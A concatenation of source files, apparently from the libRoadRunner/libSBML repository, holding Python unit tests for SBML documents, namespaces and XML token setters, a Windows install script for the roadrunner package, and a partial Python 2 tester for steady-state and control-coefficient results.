self.assert_( i == libsbml.LIBSBML_LEVEL_MISMATCH )
self.assert_( d.getModel() == None )
_dummyList = [ d ]; _dummyList[:] = []; del _dummyList
pass
def test_SBMLDocument_setModel3(self):
d = libsbml.SBMLDocument(2,2)
m1 = libsbml.Model(2,2)
i = d.setModel(m1)
self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS )
self.assert_( d.getModel() != None )
_dummyList = [ d ]; _dummyList[:] = []; del _dummyList
pass
def suite():
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(TestSBMLDocument))
return suite
if __name__ == "__main__":
if unittest.TextTestRunner(verbosity=1).run(suite()).wasSuccessful() :
sys.exit(0)
else:
sys.exit(1)
```
#### File: test/sbml/TestSBMLNamespaces.py
```python
import sys
import unittest
import libsbml
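# Unit tests for libsbml.SBMLNamespaces: the core namespace URI declared for
# each SBML level/version, plus adding and removing package namespaces.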
class TestSBMLNamespaces(unittest.TestCase):
def test_SBMLNamespaces_L1V1(self):
sbml = libsbml.SBMLNamespaces(1,1)
self.assert_( sbml.getLevel() == 1 )
self.assert_( sbml.getVersion() == 1 )
ns = sbml.getNamespaces()
self.assert_( ns.getLength() == 1 )
self.assert_( ns.getURI(0) == "http://www.sbml.org/sbml/level1" )
self.assert_( ns.getPrefix(0) == "" )
sbml = None
pass
def test_SBMLNamespaces_L1V2(self):
sbml = libsbml.SBMLNamespaces(1,2)
self.assert_( sbml.getLevel() == 1 )
self.assert_( sbml.getVersion() == 2 )
ns = sbml.getNamespaces()
self.assert_( ns.getLength() == 1 )
self.assert_( ns.getURI(0) == "http://www.sbml.org/sbml/level1" )
self.assert_( ns.getPrefix(0) == "" )
sbml = None
pass
def test_SBMLNamespaces_L2V1(self):
sbml = libsbml.SBMLNamespaces(2,1)
self.assert_( sbml.getLevel() == 2 )
self.assert_( sbml.getVersion() == 1 )
ns = sbml.getNamespaces()
self.assert_( ns.getLength() == 1 )
self.assert_( ns.getURI(0) == "http://www.sbml.org/sbml/level2" )
self.assert_( ns.getPrefix(0) == "" )
sbml = None
pass
def test_SBMLNamespaces_L2V2(self):
sbml = libsbml.SBMLNamespaces(2,2)
self.assert_( sbml.getLevel() == 2 )
self.assert_( sbml.getVersion() == 2 )
ns = sbml.getNamespaces()
self.assert_( ns.getLength() == 1 )
self.assert_( ns.getURI(0) == "http://www.sbml.org/sbml/level2/version2" )
self.assert_( ns.getPrefix(0) == "" )
sbml = None
pass
def test_SBMLNamespaces_L2V3(self):
sbml = libsbml.SBMLNamespaces(2,3)
self.assert_( sbml.getLevel() == 2 )
self.assert_( sbml.getVersion() == 3 )
ns = sbml.getNamespaces()
self.assert_( ns.getLength() == 1 )
self.assert_( ns.getURI(0) == "http://www.sbml.org/sbml/level2/version3" )
self.assert_( ns.getPrefix(0) == "" )
sbml = None
pass
def test_SBMLNamespaces_L2V4(self):
sbml = libsbml.SBMLNamespaces(2,4)
self.assert_( sbml.getLevel() == 2 )
self.assert_( sbml.getVersion() == 4 )
ns = sbml.getNamespaces()
self.assert_( ns.getLength() == 1 )
self.assert_( ns.getURI(0) == "http://www.sbml.org/sbml/level2/version4" )
self.assert_( ns.getPrefix(0) == "" )
sbml = None
pass
def test_SBMLNamespaces_L3V1(self):
sbml = libsbml.SBMLNamespaces(3,1)
self.assert_( sbml.getLevel() == 3 )
self.assert_( sbml.getVersion() == 1 )
ns = sbml.getNamespaces()
self.assert_( ns.getLength() == 1 )
self.assert_( ns.getURI(0) == "http://www.sbml.org/sbml/level3/version1/core" )
self.assert_( ns.getPrefix(0) == "" )
sbml = None
pass
def test_SBMLNamespaces_add_and_remove_namespaces(self):
sbmlns = libsbml.SBMLNamespaces( 3,1 )
self.assert_( sbmlns.getLevel() == 3 )
self.assert_( sbmlns.getVersion() == 1 )
sbmlns.addNamespace("http://www.sbml.org/sbml/level3/version1/group/version1", "group")
sbmlns.addNamespace("http://www.sbml.org/sbml/level3/version1/layout/version1", "layout")
sbmlns.addNamespace("http://www.sbml.org/sbml/level3/version1/render/version1", "render")
sbmlns.addNamespace("http://www.sbml.org/sbml/level3/version1/multi/version1", "multi")
ns = sbmlns.getNamespaces()
self.assert_( ns.getLength() == 5 )
self.assert_( ns.getURI(0) == "http://www.sbml.org/sbml/level3/version1/core" )
self.assert_( ns.getPrefix(0) == "" )
self.assert_( ns.getURI(1) == "http://www.sbml.org/sbml/level3/version1/group/version1" )
self.assert_( ns.getPrefix(1) == "group" )
self.assert_( ns.getURI(2) == "http://www.sbml.org/sbml/level3/version1/layout/version1" )
self.assert_( ns.getPrefix(2) == "layout" )
self.assert_( ns.getURI(3) == "http://www.sbml.org/sbml/level3/version1/render/version1" )
self.assert_( ns.getPrefix(3) == "render" )
self.assert_( ns.getURI(4) == "http://www.sbml.org/sbml/level3/version1/multi/version1" )
self.assert_( ns.getPrefix(4) == "multi" )
sbmlns.removeNamespace("http://www.sbml.org/sbml/level3/version1/layout/version1")
sbmlns.removeNamespace("http://www.sbml.org/sbml/level3/version1/group/version1")
sbmlns.removeNamespace("http://www.sbml.org/sbml/level3/version1/render/version1")
sbmlns.removeNamespace("http://www.sbml.org/sbml/level3/version1/multi/version1")
pass
def test_SBMLNamespaces_getURI(self):
self.assert_( libsbml.SBMLNamespaces.getSBMLNamespaceURI(1,1) == "http://www.sbml.org/sbml/level1" )
self.assert_( libsbml.SBMLNamespaces.getSBMLNamespaceURI(1,2) == "http://www.sbml.org/sbml/level1" )
self.assert_( libsbml.SBMLNamespaces.getSBMLNamespaceURI(2,1) == "http://www.sbml.org/sbml/level2" )
self.assert_( libsbml.SBMLNamespaces.getSBMLNamespaceURI(2,2) == "http://www.sbml.org/sbml/level2/version2" )
self.assert_( libsbml.SBMLNamespaces.getSBMLNamespaceURI(2,3) == "http://www.sbml.org/sbml/level2/version3" )
self.assert_( libsbml.SBMLNamespaces.getSBMLNamespaceURI(2,4) == "http://www.sbml.org/sbml/level2/version4" )
self.assert_( libsbml.SBMLNamespaces.getSBMLNamespaceURI(3,1) == "http://www.sbml.org/sbml/level3/version1/core" )
pass
def suite():
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(TestSBMLNamespaces))
return suite
if __name__ == "__main__":
if unittest.TextTestRunner(verbosity=1).run(suite()).wasSuccessful() :
sys.exit(0)
else:
sys.exit(1)
```
#### File: test/xml/TestXMLToken_newSetters.py
```python
import sys
import unittest
import libsbml
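# Unit tests for libsbml.XMLToken setters: attribute and namespace edits
# succeed on a start element constructed with an XMLAttributes object and
# return LIBSBML_INVALID_XML_OPERATION on one constructed without it.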
class TestXMLToken_newSetters(unittest.TestCase):
def test_XMLToken_newSetters_addAttributes1(self):
triple = libsbml.XMLTriple("test","","")
attr = libsbml.XMLAttributes()
token = libsbml.XMLToken(triple,attr)
xt2 = libsbml.XMLTriple("name3", "http://name3.org/", "p3")
i = token.addAttr( "name1", "val1")
self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS )
self.assert_( token.getAttributesLength() == 1 )
self.assert_( token.isAttributesEmpty() == False )
self.assert_( ( "name1" != token.getAttrName(0) ) == False )
self.assert_( ( "val1" != token.getAttrValue(0) ) == False )
i = token.addAttr( "name2", "val2", "http://name1.org/", "p1")
self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS )
self.assert_( token.getAttributesLength() == 2 )
self.assert_( token.isAttributesEmpty() == False )
self.assert_( ( "name2" != token.getAttrName(1) ) == False )
self.assert_( ( "val2" != token.getAttrValue(1) ) == False )
self.assert_( ( "http://name1.org/" != token.getAttrURI(1) ) == False )
self.assert_( ( "p1" != token.getAttrPrefix(1) ) == False )
i = token.addAttr(xt2, "val2")
self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS )
self.assert_( token.getAttributesLength() == 3 )
self.assert_( token.isAttributesEmpty() == False )
self.assert_( ( "name3" != token.getAttrName(2) ) == False )
self.assert_( ( "val2" != token.getAttrValue(2) ) == False )
self.assert_( ( "http://name3.org/" != token.getAttrURI(2) ) == False )
self.assert_( ( "p3" != token.getAttrPrefix(2) ) == False )
_dummyList = [ xt2 ]; _dummyList[:] = []; del _dummyList
_dummyList = [ triple ]; _dummyList[:] = []; del _dummyList
_dummyList = [ attr ]; _dummyList[:] = []; del _dummyList
_dummyList = [ token ]; _dummyList[:] = []; del _dummyList
pass
def test_XMLToken_newSetters_addAttributes2(self):
triple = libsbml.XMLTriple("test","","")
token = libsbml.XMLToken(triple)
xt2 = libsbml.XMLTriple("name3", "http://name3.org/", "p3")
i = token.addAttr( "name1", "val1")
self.assert_( i == libsbml.LIBSBML_INVALID_XML_OPERATION )
self.assert_( token.getAttributesLength() == 0 )
self.assert_( token.isAttributesEmpty() == True )
i = token.addAttr( "name2", "val2", "http://name1.org/", "p1")
self.assert_( i == libsbml.LIBSBML_INVALID_XML_OPERATION )
self.assert_( token.getAttributesLength() == 0 )
self.assert_( token.isAttributesEmpty() == True )
i = token.addAttr(xt2, "val2")
self.assert_( i == libsbml.LIBSBML_INVALID_XML_OPERATION )
self.assert_( token.getAttributesLength() == 0 )
self.assert_( token.isAttributesEmpty() == True )
_dummyList = [ xt2 ]; _dummyList[:] = []; del _dummyList
_dummyList = [ triple ]; _dummyList[:] = []; del _dummyList
_dummyList = [ token ]; _dummyList[:] = []; del _dummyList
pass
def test_XMLToken_newSetters_addNamespaces1(self):
triple = libsbml.XMLTriple("test","","")
attr = libsbml.XMLAttributes()
token = libsbml.XMLToken(triple,attr)
self.assert_( token.getNamespacesLength() == 0 )
self.assert_( token.isNamespacesEmpty() == True )
i = token.addNamespace( "http://test1.org/", "test1")
self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS )
self.assert_( token.getNamespacesLength() == 1 )
self.assert_( token.isNamespacesEmpty() == False )
_dummyList = [ attr ]; _dummyList[:] = []; del _dummyList
_dummyList = [ triple ]; _dummyList[:] = []; del _dummyList
_dummyList = [ token ]; _dummyList[:] = []; del _dummyList
pass
def test_XMLToken_newSetters_addNamespaces2(self):
triple = libsbml.XMLTriple("test","","")
token = libsbml.XMLToken(triple)
self.assert_( token.getNamespacesLength() == 0 )
self.assert_( token.isNamespacesEmpty() == True )
i = token.addNamespace( "http://test1.org/", "test1")
self.assert_( i == libsbml.LIBSBML_INVALID_XML_OPERATION )
self.assert_( token.getNamespacesLength() == 0 )
self.assert_( token.isNamespacesEmpty() == True )
_dummyList = [ triple ]; _dummyList[:] = []; del _dummyList
_dummyList = [ token ]; _dummyList[:] = []; del _dummyList
pass
def test_XMLToken_newSetters_clearAttributes1(self):
triple = libsbml.XMLTriple("test","","")
attr = libsbml.XMLAttributes()
token = libsbml.XMLToken(triple,attr)
nattr = libsbml.XMLAttributes()
xt1 = libsbml.XMLTriple("name1", "http://name1.org/", "p1")
nattr.add(xt1, "val1")
i = token.setAttributes(nattr)
self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS )
self.assert_( token.isAttributesEmpty() == False )
i = token.clearAttributes()
self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS )
self.assert_( token.isAttributesEmpty() == True )
_dummyList = [ nattr ]; _dummyList[:] = []; del _dummyList
_dummyList = [ attr ]; _dummyList[:] = []; del _dummyList
_dummyList = [ triple ]; _dummyList[:] = []; del _dummyList
_dummyList = [ token ]; _dummyList[:] = []; del _dummyList
_dummyList = [ xt1 ]; _dummyList[:] = []; del _dummyList
pass
def test_XMLToken_newSetters_clearNamespaces1(self):
triple = libsbml.XMLTriple("test","","")
attr = libsbml.XMLAttributes()
token = libsbml.XMLToken(triple,attr)
ns = libsbml.XMLNamespaces()
self.assert_( token.getNamespacesLength() == 0 )
self.assert_( token.isNamespacesEmpty() == True )
ns.add( "http://test1.org/", "test1")
i = token.setNamespaces(ns)
self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS )
self.assert_( token.getNamespacesLength() == 1 )
self.assert_( token.isNamespacesEmpty() == False )
i = token.clearNamespaces()
self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS )
self.assert_( token.getNamespacesLength() == 0 )
self.assert_( token.isNamespacesEmpty() == True )
_dummyList = [ attr ]; _dummyList[:] = []; del _dummyList
_dummyList = [ triple ]; _dummyList[:] = []; del _dummyList
_dummyList = [ token ]; _dummyList[:] = []; del _dummyList
_dummyList = [ ns ]; _dummyList[:] = []; del _dummyList
pass
def test_XMLToken_newSetters_removeAttributes1(self):
triple = libsbml.XMLTriple("test","","")
attr = libsbml.XMLAttributes()
token = libsbml.XMLToken(triple,attr)
xt2 = libsbml.XMLTriple("name3", "http://name3.org/", "p3")
xt1 = libsbml.XMLTriple("name5", "http://name5.org/", "p5")
i = token.addAttr( "name1", "val1")
i = token.addAttr( "name2", "val2", "http://name1.org/", "p1")
i = token.addAttr(xt2, "val2")
i = token.addAttr( "name4", "val4")
self.assert_( token.getAttributes().getLength() == 4 )
i = token.removeAttr(7)
self.assert_( i == libsbml.LIBSBML_INDEX_EXCEEDS_SIZE )
i = token.removeAttr( "name7")
self.assert_( i == libsbml.LIBSBML_INDEX_EXCEEDS_SIZE )
i = token.removeAttr( "name7", "namespaces7")
self.assert_( i == libsbml.LIBSBML_INDEX_EXCEEDS_SIZE )
i = token.removeAttr(xt1)
self.assert_( i == libsbml.LIBSBML_INDEX_EXCEEDS_SIZE )
self.assert_( token.getAttributes().getLength() == 4 )
i = token.removeAttr(3)
self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS )
self.assert_( token.getAttributes().getLength() == 3 )
i = token.removeAttr( "name1")
self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS )
self.assert_( token.getAttributes().getLength() == 2 )
i = token.removeAttr( "name2", "http://name1.org/")
self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS )
self.assert_( token.getAttributes().getLength() == 1 )
i = token.removeAttr(xt2)
self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS )
self.assert_( token.getAttributes().getLength() == 0 )
_dummyList = [ xt1 ]; _dummyList[:] = []; del _dummyList
_dummyList = [ xt2 ]; _dummyList[:] = []; del _dummyList
_dummyList = [ triple ]; _dummyList[:] = []; del _dummyList
_dummyList = [ attr ]; _dummyList[:] = []; del _dummyList
_dummyList = [ token ]; _dummyList[:] = []; del _dummyList
pass
def test_XMLToken_newSetters_removeNamespaces(self):
triple = libsbml.XMLTriple("test","","")
attr = libsbml.XMLAttributes()
token = libsbml.XMLToken(triple,attr)
token.addNamespace( "http://test1.org/", "test1")
self.assert_( token.getNamespacesLength() == 1 )
i = token.removeNamespace(4)
self.assert_( i == libsbml.LIBSBML_INDEX_EXCEEDS_SIZE )
self.assert_( token.getNamespacesLength() == 1 )
i = token.removeNamespace(0)
self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS )
self.assert_( token.getNamespacesLength() == 0 )
_dummyList = [ token ]; _dummyList[:] = []; del _dummyList
_dummyList = [ triple ]; _dummyList[:] = []; del _dummyList
_dummyList = [ attr ]; _dummyList[:] = []; del _dummyList
pass
def test_XMLToken_newSetters_removeNamespaces1(self):
triple = libsbml.XMLTriple("test","","")
attr = libsbml.XMLAttributes()
token = libsbml.XMLToken(triple,attr)
token.addNamespace( "http://test1.org/", "test1")
self.assert_( token.getNamespacesLength() == 1 )
i = token.removeNamespace( "test2")
self.assert_( i == libsbml.LIBSBML_INDEX_EXCEEDS_SIZE )
self.assert_( token.getNamespacesLength() == 1 )
i = token.removeNamespace( "test1")
self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS )
self.assert_( token.getNamespacesLength() == 0 )
_dummyList = [ token ]; _dummyList[:] = []; del _dummyList
_dummyList = [ triple ]; _dummyList[:] = []; del _dummyList
_dummyList = [ attr ]; _dummyList[:] = []; del _dummyList
pass
def test_XMLToken_newSetters_setAttributes1(self):
triple = libsbml.XMLTriple("test","","")
attr = libsbml.XMLAttributes()
token = libsbml.XMLToken(triple,attr)
nattr = libsbml.XMLAttributes()
xt1 = libsbml.XMLTriple("name1", "http://name1.org/", "p1")
nattr.add(xt1, "val1")
i = token.setAttributes(nattr)
self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS )
self.assert_( token.isAttributesEmpty() == False )
_dummyList = [ nattr ]; _dummyList[:] = []; del _dummyList
_dummyList = [ attr ]; _dummyList[:] = []; del _dummyList
_dummyList = [ triple ]; _dummyList[:] = []; del _dummyList
_dummyList = [ token ]; _dummyList[:] = []; del _dummyList
_dummyList = [ xt1 ]; _dummyList[:] = []; del _dummyList
pass
def test_XMLToken_newSetters_setAttributes2(self):
triple = libsbml.XMLTriple("test","","")
token = libsbml.XMLToken(triple)
nattr = libsbml.XMLAttributes()
xt1 = libsbml.XMLTriple("name1", "http://name1.org/", "p1")
nattr.add(xt1, "val1")
i = token.setAttributes(nattr)
self.assert_( i == libsbml.LIBSBML_INVALID_XML_OPERATION )
self.assert_( token.isAttributesEmpty() == True )
_dummyList = [ nattr ]; _dummyList[:] = []; del _dummyList
_dummyList = [ triple ]; _dummyList[:] = []; del _dummyList
_dummyList = [ token ]; _dummyList[:] = []; del _dummyList
_dummyList = [ xt1 ]; _dummyList[:] = []; del _dummyList
pass
def test_XMLToken_newSetters_setEOF(self):
token = libsbml.XMLToken()
self.assert_( token.isEnd() == False )
i = token.setEOF()
self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS )
self.assert_( token.isEnd() == False )
self.assert_( token.isStart() == False )
self.assert_( token.isText() == False )
_dummyList = [ token ]; _dummyList[:] = []; del _dummyList
pass
def test_XMLToken_newSetters_setEnd(self):
token = libsbml.XMLToken()
self.assert_( token.isEnd() == False )
i = token.setEnd()
self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS )
self.assert_( token.isEnd() == True )
i = token.unsetEnd()
self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS )
self.assert_( token.isEnd() == False )
_dummyList = [ token ]; _dummyList[:] = []; del _dummyList
pass
def test_XMLToken_newSetters_setNamespaces1(self):
triple = libsbml.XMLTriple("test","","")
attr = libsbml.XMLAttributes()
token = libsbml.XMLToken(triple,attr)
ns = libsbml.XMLNamespaces()
self.assert_( token.getNamespacesLength() == 0 )
self.assert_( token.isNamespacesEmpty() == True )
ns.add( "http://test1.org/", "test1")
i = token.setNamespaces(ns)
self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS )
self.assert_( token.getNamespacesLength() == 1 )
self.assert_( token.isNamespacesEmpty() == False )
_dummyList = [ attr ]; _dummyList[:] = []; del _dummyList
_dummyList = [ triple ]; _dummyList[:] = []; del _dummyList
_dummyList = [ token ]; _dummyList[:] = []; del _dummyList
_dummyList = [ ns ]; _dummyList[:] = []; del _dummyList
pass
def test_XMLToken_newSetters_setNamespaces2(self):
triple = libsbml.XMLTriple("test","","")
token = libsbml.XMLToken(triple)
ns = libsbml.XMLNamespaces()
self.assert_( token.getNamespacesLength() == 0 )
self.assert_( token.isNamespacesEmpty() == True )
ns.add( "http://test1.org/", "test1")
i = token.setNamespaces(ns)
self.assert_( i == libsbml.LIBSBML_INVALID_XML_OPERATION )
self.assert_( token.getNamespacesLength() == 0 )
self.assert_( token.isNamespacesEmpty() == True )
_dummyList = [ triple ]; _dummyList[:] = []; del _dummyList
_dummyList = [ token ]; _dummyList[:] = []; del _dummyList
_dummyList = [ ns ]; _dummyList[:] = []; del _dummyList
pass
def test_XMLToken_newSetters_setTriple1(self):
triple = libsbml.XMLTriple("test","","")
token = libsbml.XMLToken()
i = token.setTriple(triple)
self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS )
self.assert_(( "test" == token.getName() ))
_dummyList = [ triple ]; _dummyList[:] = []; del _dummyList
_dummyList = [ token ]; _dummyList[:] = []; del _dummyList
pass
def test_XMLToken_newSetters_setTriple2(self):
triple = libsbml.XMLTriple("test","","")
token = libsbml.XMLToken("This is text")
i = token.setTriple(triple)
self.assert_( i == libsbml.LIBSBML_INVALID_XML_OPERATION )
_dummyList = [ triple ]; _dummyList[:] = []; del _dummyList
_dummyList = [ token ]; _dummyList[:] = []; del _dummyList
pass
def suite():
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(TestXMLToken_newSetters))
return suite
if __name__ == "__main__":
if unittest.TextTestRunner(verbosity=1).run(suite()).wasSuccessful() :
sys.exit(0)
else:
sys.exit(1)
```
#### File: wrappers/Python/install_roadrunner_win.py
```python
import site
import shutil
import os.path
import os
def rmroadrunner(path):
print('deleting roadrunner from ' + path)
try:
os.remove(os.path.join(path, 'roadrunner.py'))
except:
pass
try:
os.remove(os.path.join(path, 'roadrunner.pyc'))
except:
pass
try:
os.remove(os.path.join(path, '_roadrunner.pyd'))
except:
pass
try:
os.remove(os.path.join(path, '_roadrunner.so'))
except:
pass
shutil.rmtree(os.path.join(path, 'roadrunner'), ignore_errors=True)
splist = site.getsitepackages()
sp = ''
for s in splist:
rmroadrunner(s)
if s.find('site-packages') > 0:
sp = s
print('installing roadrunner to site packages dir: ' + sp)
dst = os.path.join(sp, 'roadrunner')
# src dir should be the location of the roadrunner package, i.e.
# src directory is: c:\Users\IEUser\local\site-packages\roadrunner
# resolve the path relative to this file, since the cwd may differ from the
# file's directory if the script is run from, say, the desktop.
cwd = os.path.dirname(os.path.abspath(__file__))
src = os.path.abspath(os.path.join(cwd, 'site-packages', 'roadrunner'))
print('src directory is :' + src)
print("destination directory is: " + dst)
shutil.copytree(src, dst)
```
#### File: roadrunner/testing/tester.py
```python
import sys
import random
import string
import roadrunner
from numpy import *
import os
# Module wide file handle
fHandle = ''
rpadding = 45
sbmlStr = ''
JarnacStr = ''
def defaultTestFilePath():
"""
get the full path of the default data file
"""
me = os.path.realpath(__file__)
base = os.path.split(me)[0]
testfile = os.path.join(base, 'results_roadRunnerTest_1.txt')
if os.path.isfile(testfile):
return testfile
else:
        raise Exception('installation error, test file, ' + testfile + ' does not exist')
# --------------------------------------------------------------------------
# SUPPORT ROUTINES
# --------------------------------------------------------------------------
def expectApproximately (a, b, tol):
diff = a - b
return abs(diff) < tol
def passMsg (errorFlag):
if errorFlag:
return "*****FAIL*****"
else:
return "PASS"
# Empty lines are ignored
# Lines starting with # are also ignored
def readLine ():
    # skip blank lines and comment lines; readline() returns '' at EOF,
    # which the original triple-loop version could spin on forever
    line = fHandle.readline()
    while line != '' and ((line[0] == '\n') or (line[0] == '#')):
        line = fHandle.readline()
    return line.strip('\n')
def jumpToNextTest():
line = readLine()
#line = ''
#while line == '':
# line = fHandle.readline().strip ('\n')
while line[0] != '[':
line = readLine()
return line
def getSBMLStr ():
sbmlStr = ''
line = fHandle.readline()
while (line != '[END_MODEL]' + '\n'):
sbmlStr = sbmlStr + line
line = fHandle.readline()
return sbmlStr
def getJarnacStr ():
JarnacStr = ''
line = fHandle.readline()
while (line != '[END_MODEL]' + '\n'):
JarnacStr = JarnacStr + line
line = fHandle.readline()
return JarnacStr
def loadSBMLModelFromTestFile ():
testId = jumpToNextTest()
if testId == '[SBML]':
return getSBMLStr ()
def loadJarnacModelFromTestFile ():
testId = jumpToNextTest ()
if testId == '[JARNAC]':
return getJarnacStr ()
# ------------------------------------------------------------------------
# TESTS START HERE
# ------------------------------------------------------------------------
def setConservationLaw(rrInstance, testId):
line = readLine ()
if line == 'True':
rrInstance.conservedMoietyAnalysis = True
else:
rrInstance.conservedMoietyAnalysis = False
def mySetSteadyStateSelectionList(rrInstance, testId):
line = readLine ()
words = line.split()
rrInstance.steadyStateSelections = words
def myComputeSteadyState(rrInstance, testId):
line = readLine ()
if line == "True":
print "Compute Steady State, distance to SteadyState:", rrInstance.steadyState()
def checkSpeciesConcentrations(rrInstance, testId):
words = []
species = []
m = rrInstance.model.getNumFloatingSpecies()
for i in range (0,m):
line = readLine ()
words = line.split()
words.append (rrInstance.model[words[0]])
species.append (words)
# Steady State Concentrations
print string.ljust ("Check " + testId, rpadding),
errorFlag = False
for i in range (0,m):
expectedValue = float (species[i][1])
if expectApproximately (expectedValue, species[i][2], 1E-6) == False:
errorFlag = True
break
print passMsg (errorFlag)
def checkFluxes(rrInstance, testId):
words = []
fluxes = []
# Steady State Fluxes
print string.ljust ("Check " + testId, rpadding),
errorFlag = False
m = rrInstance.model.getNumFloatingSpecies()
n = rrInstance.model.getNumReactions();
for i in range (0,n):
line = readLine ()
words = line.split()
words.append (rrInstance.model[words[0]])
fluxes.append (words)
for i in range (0,n):
expectedValue = float (fluxes[i][1])
if expectApproximately (expectedValue, fluxes[i][2], 1E-6) == False:
errorFlag = True
break
print passMsg (errorFlag)
def checkFullJacobian(rrInstance, testId):
# Jacobian
print string.ljust ("Check " + testId, rpadding),
errorFlag = False
m = rrInstance.model.getNumFloatingSpecies()
Jacobian = rrInstance.getFullJacobian()
for i in range(0,m):
line = readLine ()
words = line.split()
for j in range(0,m):
expectedValue = float(words[j])
if expectApproximately (expectedValue, Jacobian[i,j], 1E-6) == False:
errorFlag = True
break
print passMsg (errorFlag)
def checkIndividualEigenvalues(rrInstance, testId):
# Eigenvalues
print string.ljust ("Check " + testId, rpadding),
errorFlag = False
m = rrInstance.model.getNumFloatingSpecies()
try:
for i in range(0,m):
line = readLine ()
words = line.split()
eigenvalueName = words[0]
realPart = rrInstance.getValue ('eigen(' + eigenvalueName + ')')
realPart = float (realPart)
if expectApproximately (realPart, float(words[1]), 1E-6) == False:
errorFlag = True
break
print passMsg (errorFlag)
except Exception, e:
print('Unexpected error in checkIndividualEigenvalues:' + str(e))
def checkEigenvalueMatrix(rrInstance, testId):
# Eigenvalues
print string.ljust ("Check " + testId, rpadding),
errorFlag = False
m = rrInstance.model.getNumFloatingSpecies()
eigenvalues = rrInstance.getEigenvalues()
for i in range(0,m):
line = readLine ()
words = line.split()
realPart = float (words[0])
# Check if there is an imaginary part
if len (words) == 1:
imagPart = 0
else:
imagPart= float (words[1])
if (expectApproximately (realPart, eigenvalues[i,0], 1E-6) == False) or (expectApproximately (imagPart, eigenvalues[i,1], 1E-6)) == False:
errorFlag = True
break
print passMsg (errorFlag)
def checkStoichiometryMatrix(rrInstance, testId):
# Stoichiometry matrix
print string.ljust ("Check " + testId, rpadding),
errorFlag = False
m = rrInstance.model.getNumFloatingSpecies()
n = rrInstance.model.getNumReactions();
st = rrInstance.model.getStoichiometryMatrix()
for i in range(0,m):
line = readLine ()
words = line.split()
for j in range(0,n):
if expectApproximately(float (words[j]), st[i,j], 1E-6) == False:
errorFlag = True
break
print passMsg (errorFlag)
def checkLinkMatrix(rrInstance, testId):
# Link matrix
print string.ljust ("Check " + testId, rpadding),
errorFlag = False
m = rrInstance.model.getNumFloatingSpecies()
st = rrInstance.getLinkMatrix()
for i in range(0,m):
words = readLine ().split()
for j in range(0,m):
if expectApproximately(float (words[j]), st[i,j], 1E-6) == False:
errorFlag = True
break
print passMsg (errorFlag)
def checkUnscaledConcentrationControlMatrix(rrInstance, testId):
# Unscaled Concentration Control matrix
print string.ljust ("Check " + testId, rpadding),
words = []
errorFlag = False
m = rrInstance.model.getNumFloatingSpecies()
n = rrInstance.model.getNumReactions();
st = rrInstance.getUnscaledConcentrationControlCoefficientMatrix();
for i in range(0,m):
words = readLine ().split()
for j in range(0,n):
if expectApproximately(float (words[j]), st[i,j], 1E-6) == False:
errorFlag = True
break
print passMsg (errorFlag)
def checkScaledConcentrationControlMatrix(rrInstance, testId):
# Unscaled Concentration Control matrix
print string.ljust ("Check " + testId, rpadding),
words = []
errorFlag = False
m = rrInstance.model.getNumFloatingSpecies()
n = rrInstance.model.getNumReactions();
st = rrInstance.getScaledConcentrationControlCoefficientMatrix();
for i in range(0,m):
words = readLine ().split()
for j in range(0,n):
if expectApproximately(float (words[j]), st[i,j], 1E-6) == False:
errorFlag = True
break
print passMsg (errorFlag)
def checkUnscaledFluxControlCoefficientMatrix(rrInstance, testId):
# Unscaled Flux Control matrix
print string.ljust ("Check " + testId, rpadding),
words = []
errorFlag = False
n = rrInstance.model.getNumReactions();
st = rrInstance.getUnscaledFluxControlCoefficientMatrix();
for i in range(0,n):
words = readLine ().split()
for j in range(0,n):
if expectApproximately(float (words[j]), st[i,j], 1E-6) == False:
errorFlag = True
break
print passMsg (errorFlag)
def checkScaledFluxControlCoefficientMatrix(rrInstance, testId):
# Unscaled Flux Control matrix
print string.ljust ("Check " + testId, rpadding),
words = []
errorFlag = False
n = rrInstance.model.getNumReactions();
st = rrInstance.getScaledFluxControlCoefficientMatrix()
for i in range(0,n):
words = readLine ().split()
for j in range(0,n):
if expectApproximately(float (words[j]), st[i,j], 1E-6) == False:
errorFlag = True
break
print passMsg (errorFlag)
def checkUnscaledElasticityMatrix(rrInstance, testId):
# Jacobian
print string.ljust ("Check " + testId, rpadding),
errorFlag = False
m = rrInstance.model.getNumFloatingSpecies()
uee = rrInstance.getUnscaledElasticityMatrix()
for i in range(0,m):
line = readLine ()
words = line.split()
for j in range(0,m):
expectedValue = float(words[j])
if expectApproximately (expectedValue, uee[i,j], 1E-6) == False:
errorFlag = True
break
print passMsg (errorFlag)
def checkScaledElasticityMatrix(rrInstance, testId):
# Jacobian
print string.ljust ("Check " + testId, rpadding),
errorFlag = False
m = rrInstance.model.getNumFloatingSpecies()
ee = rrInstance.getScaledElasticityMatrix()
for i in range(0,m):
line = readLine ()
words = line.split()
for j in range(0,m):
expectedValue = float(words[j])
if expectApproximately (expectedValue, ee[i,j], 1E-6) == False:
errorFlag = True
break
print passMsg (errorFlag)
def checkGetFloatingSpeciesIds(rrInstance, testId):
print string.ljust ("Check " + testId, rpadding),
errorFlag = False
line = readLine ()
words = line.split()
expected = rrInstance.model.getFloatingSpeciesIds()
m = rrInstance.model.getNumFloatingSpecies()
for i in range(0,m):
if words[i] != expected[i]:
errorFlag = True
break
print passMsg (errorFlag)
def checkGetBoundarySpeciesIds(rrInstance, testId):
